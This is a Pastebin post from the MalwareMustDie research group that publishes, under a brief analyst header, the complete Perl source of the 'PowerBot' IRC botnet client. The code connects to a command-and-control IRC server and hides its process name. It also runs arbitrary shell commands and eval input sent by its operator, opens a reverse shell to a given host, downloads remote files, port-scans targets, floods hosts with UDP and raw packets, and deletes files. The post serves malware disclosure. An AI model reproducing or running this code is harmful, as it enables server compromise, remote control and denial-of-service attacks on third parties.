SHARE
TWEET

PowerBot Perl IRCBot | Case #8 - Journey to Abused FTP

MalwareMustDie Jun 4th, 2014 445 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #MalwareMustDie!! analysis by: @unixfreaxjp | $ date
  2. Wed Jun  4 23:05:21 JST 2014
  3. # Perl PowerBot IRC Bot, with functions of:
  4. # Hacked the server important dirs (removal),
  5. # UDP DoS, PortScanner, File Downloader, Shell Backdoor(backconnect), IRC attacks,
  6. # Bot code is snagged by MalwareMustDie,
  7. #Case: http://blog.malwaremustdie.org/2014/06/a-journey-to-abused-ftp-sites-story-of.html
  8.  
  9. #!/usr/bin/perl
  10. my @mast3rs = ("R");
  11.  
  12. my @hostauth = ("x");
  13. my @admchan=("#x");
  14.  
  15. my @server = ("myircd.wha.la");
  16. $servidor= $server[rand scalar @server] unless $servidor;
  17.  
  18.  
  19. my $xeqt = "!";
  20. my $homedir = "/tmp";
  21. my $shellaccess = 1;
  22. my $xstats = 1;
  23. my $pacotes = 1;
  24. my $linas_max = 5;
  25. my $sleep = 6;
  26. my $portime = 4;
  27.  
  28. my @fakeps = ("ps x");
  29.  
  30. my @nickname = ("LINUX");
  31.  
  32. my @xident = ("KAST");
  33. my @xname = (`uname -a`);
  34.  
  35. #################
  36. # Random Ports
  37. #################
  38. my @rports = ("3303");
  39.  
  40. my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001",
  41.    "\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001",
  42.    "\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001",
  43.    "\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001",
  44.    "\001Snak for Macintosh 4.9.8 English\001",
  45.    "\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001",
  46.    "\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001",
  47.    "\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001",
  48.    "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001",
  49.    "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001",
  50.    "\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001",
  51.    "\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001",
  52.    "\001ircN 8.00 - he tries to tell me what I put inside of me -\001",
  53.    "\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001",
  54.    "\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001",
  55.    "\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001",
  56.    "\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001",
  57.    "\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001",
  58.    "\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001",
  59.    "\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001",
  60.    "\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001",
  61.    "\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001",
  62.    "\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1ツ?9] : Keep it to yourself!\001",
  63.    "\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001",
  64.    "\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001",
  65.    "\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10 - running on FreeBSD i386\001",
  66.    "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there\001",
  67.    "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there\001");
  68.  
  69. # Default quick scan ports
  70. my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");
  71.  
  72. # xeQt
  73.  
  74. #my $nick = "Power";
  75. my $nick = $nickname[rand scalar @nickname];
  76. my $realname = $xname[rand scalar @xname];
  77. my $ircname = $xident[rand scalar @xident];
  78. my $porta = $rports[rand scalar @rports];
  79. my $xproc = $fakeps[rand scalar @fakeps];
  80. my $Mrx = $Mrx[rand scalar @Mrx];
  81. my $version = 'PowerBots (C) GohacK';
  82.  
  83. $SIG{'INT'} = 'IGNORE';
  84. $SIG{'HUP'} = 'IGNORE';
  85. $SIG{'TERM'} = 'IGNORE';
  86. $SIG{'CHLD'} = 'IGNORE';
  87. $SIG{'PS'} = 'IGNORE';
  88.  
  89. use IO::Socket;
  90. use Socket;
  91. use IO::Select;
  92. chdir("$homedir");
  93. $servidor="$ARGV[0]" if $ARGV[0];
  94. $0="$xproc"."\0";
  95. my $pid = fork;
  96. exit if $pid;
  97. die "[x] -> Cannot fork into background: $!" unless defined($pid);
  98. my %irc_servers;
  99. my %DCC;
  100. my $dcc_sel = new IO::Select->new();
  101.  
  102. sub getnick {
  103.   return "$nickname[rand scalar @nickname]".int(rand(20000));
  104. }
  105.  
  106. sub getstore ($$)
  107. {
  108.   my $url = shift;
  109.   my $file = shift;
  110.  
  111.   $http_stream_out = 1;
  112.   open(GET_OUTFILE, "> $file");
  113.   %http_loop_check = ();
  114.   _get($url);
  115.   close GET_OUTFILE;
  116.   return $main::http_get_result;
  117. }
  118. sub _get
  119. {
  120.   my $url = shift;
  121.   my $proxy = "";
  122.   grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
  123.   if (($proxy eq "") && $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) {
  124.     my $host = $1;
  125.     my $port = $2 || 80;
  126.     my $path = $3;
  127.     $path = "/" unless defined($path);
  128.     return _trivial_http_get($host, $port, $path);
  129.   } elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) {
  130.     my $host = $1;
  131.     my $port = $2;
  132.     my $path = $url;
  133.     return _trivial_http_get($host, $port, $path);
  134.   } else {
  135.     return undef;
  136.   }
  137. }
  138. sub _trivial_http_get
  139. {
  140.   my($host, $port, $path) = @_;
  141.   my($AGENT, $VERSION, $p);
  142.   #print "HOST=$host, PORT=$port, PATH=$path\n";
  143.  
  144.   $AGENT = "get-minimal";
  145.   $VERSION = "20000118";
  146.  
  147.   $path =~ s/ /%20/g;
  148.  
  149.   require IO::Socket;
  150.   local($^W) = 0;
  151.   my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto   => 'tcp', Timeout  => 60) || return;
  152.  
  153.   $sock->autoflush;
  154.   my $netloc = $host;
  155.   $netloc .= ":$port" if $port != 80;
  156.   my $request = "GET $path HTTP/1.0\015\012"
  157.               . "Host: $netloc\015\012"
  158.               . "User-Agent: $AGENT/$VERSION/u\015\012";
  159.   $request .= "Pragma: no-cache\015\012" if ($main::http_no_cache);
  160.   $request .= "\015\012";
  161.   print $sock $request;
  162.   my $buf = "";
  163.   my $n;
  164.   my $b1 = "";
  165.   while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
  166.     if ($b1 eq "") {
  167.       $b1 = $buf;
  168.       $buf =~ s/.+?\015?\012\015?\012//s;
  169.     }
  170.     if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; }
  171.   }
  172.   return undef unless defined($n);
  173.   $main::http_get_result = 200;
  174.   if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) {
  175.     $main::http_get_result = $1;
  176.     # print "CODE=$main::http_get_result\n$b1\n";
  177.     if ($main::http_get_result =~ /^30[1237]/ && $b1 =~ /\012Location:\s*(\S+)/) {
  178.       my $url = $1;
  179.       return undef if $http_loop_check{$url}++;
  180.       return _get($url);
  181.     }
  182.     return undef unless $main::http_get_result =~ /^2/;
  183.   }
  184.   return $buf;
  185. }
  186. $sel_cliente = IO::Select->new();
  187. sub sendraw {
  188.   if ($#_ == '1') {
  189.     my $socket = $_[0];
  190.     print $socket "$_[1]\n";
  191.   } else {
  192.       print $IRC_cur_socket "$_[0]\n";
  193.   }
  194. }
  195. sub conectar {
  196.    my $meunick = $_[0];
  197.    my $servidor_con = $_[1];
  198.    my $porta_con = $_[2];
  199.    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
  200.    if (defined($IRC_socket)) {
  201.      $IRC_cur_socket = $IRC_socket;
  202.      $IRC_socket->autoflush(1);
  203.      $sel_cliente->add($IRC_socket);
  204.      $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
  205.      $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
  206.      $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  207.      $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
  208.      nick("$meunick");
  209.      sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
  210.      sleep 2;
  211.    }
  212. }
  213. my $line_temp;
  214. while( 1 ) {
  215.    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
  216.    delete($irc_servers{''}) if (defined($irc_servers{''}));
  217.    &DCC::connections;
  218.    my @ready = $sel_cliente->can_read(0.6);
  219.    next unless(@ready);
  220.    foreach $fh (@ready) {
  221.      $IRC_cur_socket = $fh;
  222.      $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
  223.      $nread = sysread($fh, $msg, 4096);
  224.      if ($nread == 0) {
  225.         $sel_cliente->remove($fh);
  226.         $fh->close;
  227.         delete($irc_servers{$fh});
  228.      }
  229.      @lines = split (/\n/, $msg);
  230.      for(my $c=0; $c<= $#lines; $c++) {
  231.        $line = $lines[$c];
  232.        $line=$line_temp.$line if ($line_temp);
  233.        $line_temp='';
  234.        $line =~ s/\r$//;
  235.        unless ($c == $#lines) {
  236.          parse("$line");
  237.        } else {
  238.            if ($#lines == 0) {
  239.              parse("$line");
  240.            } elsif ($lines[$c] =~ /\r$/) {
  241.                parse("$line");
  242.            } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  243.                parse("$line");
  244.            } else {
  245.                $line_temp = $line;
  246.            }
  247.        }
  248.       }
  249.    }
  250. }
  251.  
  252. sub parse {
  253.    my $servarg = shift;
  254.    if ($servarg =~ /^PING \:(.*)/) {
  255.      sendraw("PONG :$1");
  256.    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  257.        my $pn=$1; my $hostnam3=$3; my $onde = $4; my $args = $5;
  258.        if ($args =~ /^\001VERSION\001$/) {
  259.          notice("$pn", "".$Mrx."");
  260.        }
  261.        elsif ($args =~ /^\001PING\s+(\d+)\001$/) {
  262.          notice("$pn", "\001PONG\001");
  263.        }
  264.        if (grep {$_ =~ /^\Q$hostnam3\E$/i } @hostauth) {
  265.        if (grep {$_ =~ /^\Q$pn\E$/i } @mast3rs) {
  266.          if ($onde eq "$meunick"){
  267.            shell("$pn", "$args");
  268.         }
  269.     if ($args =~ /^!(.*)/){
  270.        ircase("$pn","$chan","$1");
  271.     }
  272.         if ($args =~ /^(\Q$meunick\E|\Q$xeqt\E)\s+(.*)/ ) {
  273.             my $natrix = $1;
  274.             my $arg = $2;
  275.             if ($arg =~ /^\!(.*)/) {
  276.               ircase("$pn","$onde","$1");
  277.             } elsif ($arg =~ /^\@(.*)/) {
  278.                 $ondep = $onde;
  279.                 $ondep = $pn if $onde eq $meunick;
  280.                 bfunc("$ondep","$1");
  281.             } else {
  282.                 shell("$onde", "$arg");
  283.             }
  284.           }
  285.         }
  286.       }
  287.    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  288.        if (lc($1) eq lc($meunick)) {
  289.          $meunick=$4;
  290.          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  291.        }
  292.    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  293.        $meunick = getnick();
  294.        nick("".$meunick."-");
  295.    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  296.        $meunick = $2;
  297.        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  298.        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  299.        foreach my $canal (@admchan){
  300.          sendraw("JOIN $canal muietie");
  301.        }
  302.    }
  303. }
  304. sub bfunc {
  305.   my $printl = $_[0];
  306.   my $funcarg = $_[1];
  307.   if (my $pid = fork) {
  308.      waitpid($pid, 0);
  309.   } else {
  310.       if (fork)
  311.        {
  312.          exit;
  313.        }
  314.    else
  315.    {
  316.       # Quick scan
  317.            if ($funcarg =~ /^ps (.*)/) {
  318.              my $hostip="$1";
  319.         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312Portscanning\003\002: $1 \002\00312Ports:\003\002 default");
  320.              my (@aberta, %porta_banner);
  321.              foreach my $porta (@portas)  {
  322.                 my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
  323.                 if ($scansock) {
  324.                    push (@aberta, $porta);
  325.                    $scansock->close;
  326.          sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");
  327.                 }
  328.              }
  329.              if (@aberta) {
  330.                sendraw($IRC_cur_socket, "PRIVMSG $printl :Port Scan Complete with target: $1 ");
  331.              } else {
  332.                  sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[x]\0034 No open ports found on\002 $1");
  333.              }
  334.            }
  335.       # NMAP, lol
  336.            elsif ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/)
  337.       {
  338.               my $hostname="$1";
  339.               my $portstart = "$2";
  340.                my $portend = "$3";
  341.                my (@abertas, %porta_banner);
  342.           sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312xMap Portscanning\003\002: $1 \002\00312Ports:\003\002 $2-$3");
  343.                foreach my $porta ($portstart..$portend)
  344.              {
  345.                my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
  346.                if ($scansock) {
  347.                  push (@abertas, $porta);
  348.                  $scansock->close;
  349.                  if ($xstats)
  350.        {
  351.                    sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");
  352.                  }
  353.                }
  354.              }
  355.              if (@abertas) {
  356.           sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312Scan Complate\003\002");
  357.              } else {
  358.                sendraw($IRC_cur_socket,"PRIVMSG $printl :\002\00312No ports found..\002");
  359.              }
  360.             }
  361.       # Remove
  362.       elsif ($funcarg =~ /^rm/)
  363.       {
  364.          system("cd /var/tmp ; rm -rf cb find god* wunder* udev* lib*");
  365.       sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(Quickdel)\002\00314 Removed files and folders ");
  366.       }
  367.       # Version
  368.       elsif ($funcarg =~ /^version/)
  369.       {
  370.          sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(Version)\002\00314 $version ");
  371.       }
  372.       # Download
  373.            elsif ($funcarg =~ /^down\s+(.*)\s+(.*)/)
  374.       {
  375.               getstore("$1", "$2");
  376.               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(Download)\002\00314 Page: $2 (File: $1)") if ($xstats);
  377.            }
  378.        # Udp
  379.             elsif ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
  380.               return unless $pacotes;
  381.               socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
  382.               my $alvo=inet_aton("$1");
  383.               my $porta = "$2";
  384.               my $tempo = "$3";
  385.               my $pacote;
  386.               my $pacotese;
  387.               my $fim = time + $tempo;
  388.               my $pacota = 1;
  389.          sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(UDP DDoSing)\003 Attacking\002: $1 - \002Time\002: $tempo"."seconds");
  390.               while (($pacota == "1") && ($pacotes == "1")) {
  391.                 $pacota = 0 if ((time >= $fim) && ($tempo != "0"));
  392.                 $pacote=$rand x $rand x $rand;
  393.                 $porta = int(rand 65000) +1 if ($porta == "0");
  394.                 send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
  395.               }
  396.               if ($xstats)
  397.               {
  398.                sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(UDP Complete):\003\002 $1 - \002Sendt\002: $pacotese"."kb - \002Time\002: $tempo"."seconds");
  399.              }
  400.             }
  401.  
  402.        # Backconnect
  403.             elsif ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
  404.               my $host = "$1";
  405.               my $porta = "$2";
  406.               my $proto = getprotobyname('tcp');
  407.               my $iaddr = inet_aton($host);
  408.               my $paddr = sockaddr_in($porta, $iaddr);
  409.               my $shell = "/bin/sh -i";
  410.               if ($^O eq "MSWin32") {
  411.                 $shell = "cmd.exe";
  412.               }
  413.               socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
  414.               connect(SOCKET, $paddr) or die "connect: $!";
  415.          sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[x] ->\0034 Injection ...");
  416.               open(STDIN, ">&SOCKET");
  417.               open(STDOUT, ">&SOCKET");
  418.               open(STDERR, ">&SOCKET");
  419.               system("$shell");
  420.          system("cd /tmp/.mrx");
  421.               close(STDIN);
  422.               close(STDOUT);
  423.               close(STDERR);
  424.             }
  425.            exit;
  426.        }
  427.   }
  428. }
  429.  
  430. sub ircase {
  431.   my ($kem, $printl, $case) = @_;
  432.  
  433.    if ($case =~ /^join (.*)/) {
  434.      j("$1");
  435.    }
  436.    elsif ($case =~ /^part (.*)/) {
  437.       p("$1");
  438.    }
  439.    elsif ($case =~ /^rejoin\s+(.*)/) {
  440.       my $chan = $1;
  441.       if ($chan =~ /^(\d+) (.*)/) {
  442.         for (my $ca = 1; $ca <= $1; $ca++ ) {
  443.           p("$2");
  444.           j("$2");
  445.         }
  446.       } else {
  447.           p("$chan");
  448.           j("$chan");
  449.       }
  450.    }
  451.    elsif ($case =~ /^op/) {
  452.       op("$printl", "$kem") if $case eq "op";
  453.       my $oarg = substr($case, 3);
  454.       op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  455.    }
  456.    elsif ($case =~ /^deop/) {
  457.       deop("$printl", "$kem") if $case eq "deop";
  458.       my $oarg = substr($case, 5);
  459.       deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  460.    }
  461.    elsif ($case =~ /^voice/) {
  462.       voice("$printl", "$kem") if $case eq "voice";
  463.       $oarg = substr($case, 6);
  464.       voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  465.    }
  466.    elsif ($case =~ /^devoice/) {
  467.       devoice("$printl", "$kem") if $case eq "devoice";
  468.       $oarg = substr($case, 8);
  469.       devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  470.    }
  471.    elsif ($case =~ /^msg\s+(\S+) (.*)/) {
  472.       msg("$1", "$2");
  473.    }
  474.    elsif ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
  475.       for (my $cf = 1; $cf <= $1; $cf++) {
  476.         msg("$2", "$3");
  477.       }
  478.    }
  479.    elsif ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
  480.       for (my $cf = 1; $cf <= $1; $cf++) {
  481.         ctcp("$2", "$3");
  482.       }
  483.    }
  484.    elsif ($case =~ /^ctcp\s+(\S+) (.*)/) {
  485.       ctcp("$1", "$2");
  486.    }
  487.    elsif ($case =~ /^invite\s+(\S+) (.*)/) {
  488.       invite("$1", "$2");
  489.    }
  490.    elsif ($case =~ /^nick (.*)/) {
  491.       nick("$1");
  492.    }
  493.    elsif ($case =~ /^jump\s+(\S+)\s+(\S+)/) {
  494.        conectar("$2", "$1", 6667);
  495.    }
  496.    elsif ($case =~ /^send\s+(\S+)\s+(\S+)/) {
  497.       DCC::SEND("$1", "$2");
  498.    }
  499.    elsif ($case =~ /^raw (.*)/) {
  500.       sendraw("$1");
  501.    }
  502.    elsif ($case =~ /^eval (.*)/) {
  503.       eval "$1";
  504.    }
  505.    elsif ($case =~ /^rj\s+(\S+)\s+(\d+)/) {
  506.     sleep int(rand($2));
  507.     j("$1");
  508.    }
  509.    elsif ($case =~ /^rp\s+(\S+)\s+(\d+)/) {
  510.     sleep int(rand($2));
  511.     p("$1");
  512.    }
  513.    elsif ($case =~ /^quit/) {
  514.      quit();
  515.    }
  516.    elsif ($case =~ /^rand/) {
  517.     my $novonick = getnick();
  518.      nick("$novonick");
  519.    }
  520.    elsif ($case =~ /^stat (.*)/) {
  521.      if ($1 eq "on") {
  522.       $xstats = 1;
  523.       msg("$printl", "Satus enabled");
  524.      } elsif ($1 eq "off") {
  525.       $xstats = 0;
  526.       msg("$printl", "Status disable");
  527.      }
  528.    }
  529.    elsif ($case =~ /^bang (.*)/) {
  530.      if ($1 eq "on") {
  531.       $pacotes = 1;
  532.       msg("$printl", "[x] Bang mode enabled") if ($xstats == "1");
  533.      } elsif ($1 eq "off") {
  534.       $pacotes = 0;
  535.       msg("$printl", "[x] Bang mode disabled") if ($xstats == "1");
  536.      }
  537.    }
  538. }
  539. sub shell {
  540.   return unless $shellaccess;
  541.   my $printl=$_[0];
  542.   my $comando=$_[1];
  543.   if ($comando =~ /cd (.*)/) {
  544.     chdir("$1") || msg("$printl", "cd: $1".": No such file or directory");
  545.     return;
  546.   }
  547.   elsif ($pid = fork) {
  548.      waitpid($pid, 0);
  549.   } else {
  550.       if (fork) {
  551.          exit;
  552.        } else {
  553.            my @resp=`$comando 2>&1 3>&1`;
  554.            my $c=0;
  555.            foreach my $linha (@resp) {
  556.              $c++;
  557.              chop $linha;
  558.              sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
  559.              if ($c >= "$linas_max") {
  560.                $c=0;
  561.                sleep $sleep;
  562.              }
  563.            }
  564.            exit;
  565.        }
  566.   }
  567. }
  568.  
  569. sub attacker {
  570.   my $iaddr = inet_aton($_[0]);
  571.   my $msg = 'B' x $_[1];
  572.   my $ftime = $_[2];
  573.   my $cp = 0;
  574.   my (%pacotes);
  575.   $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
  576.  
  577.   socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  578.   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  579.   socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  580.   socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  581.   return(undef) if $cp == 4;
  582.   my $itime = time;
  583.   my ($cur_time);
  584.   while ( 1 ) {
  585.      for (my $porta = 1; $porta <= 65535; $porta++) {
  586.        $cur_time = time - $itime;
  587.        last if $cur_time >= $ftime;
  588.        send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++ if ($pacotes == 1);
  589.        send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++ if ($pacotes == 1);
  590.        send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++ if ($pacotes == 1);
  591.        send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++ if ($pacotes == 1);
  592.        for (my $pc = 3; $pc <= 255;$pc++) {
  593.          next if $pc == 6;
  594.          $cur_time = time - $itime;
  595.          last if $cur_time >= $ftime;
  596.          socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
  597.          send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++ if ($pacotes == 1);
  598.        }
  599.      }
  600.      last if $cur_time >= $ftime;
  601.   }
  602.   return($cur_time, %pacotes);
  603. }
  604.  
  605. sub action {
  606.    return unless $#_ == 1;
  607.    sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
  608. }
  609. sub ctcp {
  610.    return unless $#_ == 1;
  611.    sendraw("PRIVMSG $_[0] :\001$_[1]\001");
  612. }
  613. sub msg {
  614.    return unless $#_ == 1;
  615.    sendraw("PRIVMSG $_[0] :$_[1]");
  616. }
  617. sub notice {
  618.    return unless $#_ == 1;
  619.    sendraw("NOTICE $_[0] :$_[1]");
  620. }
  621. sub op {
  622.    return unless $#_ == 1;
  623.    sendraw("MODE $_[0] +o $_[1]");
  624. }
  625. sub deop {
  626.    return unless $#_ == 1;
  627.    sendraw("MODE $_[0] -o $_[1]");
  628. }
  629. sub hop {
  630.     return unless $#_ == 1;
  631.    sendraw("MODE $_[0] +h $_[1]");
  632. }
  633. sub dehop {
  634.    return unless $#_ == 1;
  635.    sendraw("MODE $_[0] +h $_[1]");
  636. }
  637. sub voice {
  638.    return unless $#_ == 1;
  639.    sendraw("MODE $_[0] +v $_[1]");
  640. }
  641. sub devoice {
  642.    return unless $#_ == 1;
  643.    sendraw("MODE $_[0] -v $_[1]");
  644. }
  645. sub ban {
  646.    return unless $#_ == 1;
  647.    sendraw("MODE $_[0] +b $_[1]");
  648. }
  649. sub unban {
  650.    return unless $#_ == 1;
  651.    sendraw("MODE $_[0] -b $_[1]");
  652. }
  653. sub kick {
  654.    return unless $#_ == 1;
  655.    sendraw("KICK $_[0] $_[1] :$_[2]");
  656. }
  657. sub modo {
  658.    return unless $#_ == 0;
  659.    sendraw("MODE $_[0] $_[1]");
  660. }
  661. sub mode { modo(@_); }
  662. sub j { &join(@_); }
  663. sub join {
  664.    return unless $#_ == 0;
  665.    sendraw("JOIN $_[0]");
  666. }
  667. sub p { part(@_); }
  668. sub part {sendraw("PART $_[0]");}
  669. sub nick {
  670.   return unless $#_ == 0;
  671.   sendraw("NICK $_[0]");
  672. }
  673. sub invite {
  674.    return unless $#_ == 1;
  675.    sendraw("INVITE $_[1] $_[0]");
  676. }
  677. sub topico {
  678.    return unless $#_ == 1;
  679.    sendraw("TOPIC $_[0] $_[1]");
  680. }
  681. sub topic { topico(@_); }
  682. sub whois {
  683.   return unless $#_ == 0;
  684.   sendraw("WHOIS $_[0]");
  685. }
  686. sub who {
  687.   return unless $#_ == 0;
  688.   sendraw("WHO $_[0]");
  689. }
  690. sub names {
  691.   return unless $#_ == 0;
  692.   sendraw("NAMES $_[0]");
  693. }
  694. sub away {
  695.   sendraw("AWAY $_[0]");
  696. }
  697. sub back { away(); }
  698. sub quit {
  699.   sendraw("QUIT :$_[0]");
  700.   exit;
  701. }
  702.  
  703. package DCC;
  704. sub connections {
  705.    my @ready = $dcc_sel->can_read(1);
  706. #   return unless (@ready);
  707.    foreach my $fh (@ready) {
  708.      my $dcctipo = $DCC{$fh}{tipo};
  709.      my $arquivo = $DCC{$fh}{arquivo};
  710.      my $bytes = $DCC{$fh}{bytes};
  711.      my $cur_byte = $DCC{$fh}{curbyte};
  712.      my $nick = $DCC{$fh}{nick};
  713.      my $msg;
  714.      my $nread = sysread($fh, $msg, 10240);
  715.      if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
  716.         $DCC{$fh}{status} = "Cancelado";
  717.         $DCC{$fh}{ftime} = time;
  718.         $dcc_sel->remove($fh);
  719.         $fh->close;
  720.         next;
  721.      }
  722.      if ($dcctipo eq "get") {
  723.         $DCC{$fh}{curbyte} += length($msg);
  724.  
  725.         my $cur_byte = $DCC{$fh}{curbyte};
  726.  
  727.         open(FILE, ">> $arquivo");
  728.         print FILE "$msg" if ($cur_byte <= $bytes);
  729.         close(FILE);
  730.  
  731.         my $packbyte = pack("N", $cur_byte);
  732.         print $fh "$packbyte";
  733.  
  734.         if ($bytes == $cur_byte) {
  735.            $dcc_sel->remove($fh);
  736.            $fh->close;
  737.            $DCC{$fh}{status} = "Recebido";
  738.            $DCC{$fh}{ftime} = time;
  739.            next;
  740.         }
  741.      } elsif ($dcctipo eq "send") {
  742.           my $send = $fh->accept;
  743.           $send->autoflush(1);
  744.           $dcc_sel->add($send);
  745.           $dcc_sel->remove($fh);
  746.           $DCC{$send}{tipo} = 'sendcon';
  747.           $DCC{$send}{itime} = time;
  748.           $DCC{$send}{nick} = $nick;
  749.           $DCC{$send}{bytes} = $bytes;
  750.           $DCC{$send}{curbyte} = 0;
  751.           $DCC{$send}{arquivo} = $arquivo;
  752.           $DCC{$send}{ip} = $send->peerhost;
  753.           $DCC{$send}{porta} = $send->peerport;
  754.           $DCC{$send}{status} = "Enviando";
  755.           open(FILE, "< $arquivo");
  756.           my $fbytes;
  757.           read(FILE, $fbytes, 1024);
  758.           print $send "$fbytes";
  759.           close FILE;
  760. #          delete($DCC{$fh});
  761.      } elsif ($dcctipo eq 'sendcon') {
  762.           my $bytes_sended = unpack("N", $msg);
  763.           $DCC{$fh}{curbyte} = $bytes_sended;
  764.           if ($bytes_sended == $bytes) {
  765.              $fh->close;
  766.              $dcc_sel->remove($fh);
  767.              $DCC{$fh}{status} = "Enviado";
  768.              $DCC{$fh}{ftime} = time;
  769.              next;
  770.           }
  771.           open(SENDFILE, "< $arquivo");
  772.           seek(SENDFILE, $bytes_sended, 0);
  773.           my $send_bytes;
  774.           read(SENDFILE, $send_bytes, 1024);
  775.           print $fh "$send_bytes";
  776.           close(SENDFILE);
